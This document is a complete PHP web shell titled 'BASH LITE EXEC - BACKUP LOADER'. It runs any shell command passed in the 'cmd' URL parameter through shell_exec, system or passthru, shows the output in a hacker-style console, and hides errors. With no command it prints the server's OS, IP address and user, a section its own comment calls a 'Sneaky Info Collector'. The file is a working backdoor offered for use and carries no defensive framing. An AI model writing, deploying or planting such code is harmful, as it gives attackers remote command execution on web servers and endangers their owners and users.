<?php
/**
 * BASH LITE EXEC - BACKUP LOADER
 */
error_reporting(0);
if(isset($_GET['cmd'])){
    $c = $_GET['cmd'];
    echo "<style>body{background:#000;color:#0f0;font-family:monospace;padding:20px;}</style>";
    echo "<b>Executing: $c</b><hr>";
    echo "<pre>";
    if(function_exists('shell_exec')) {
        echo shell_exec($c . " 2>&1");
    } elseif(function_exists('system')) {
        system($c);
    } elseif(function_exists('passthru')) {
        passthru($c);
    } else {
        echo "All exec functions are disabled!";
    }
    echo "</pre>";
    exit;
}

// Sneaky Info Collector
echo "OS: " . PHP_OS . " | IP: " . $_SERVER['SERVER_ADDR'] . " | User: " . get_current_user();
?>
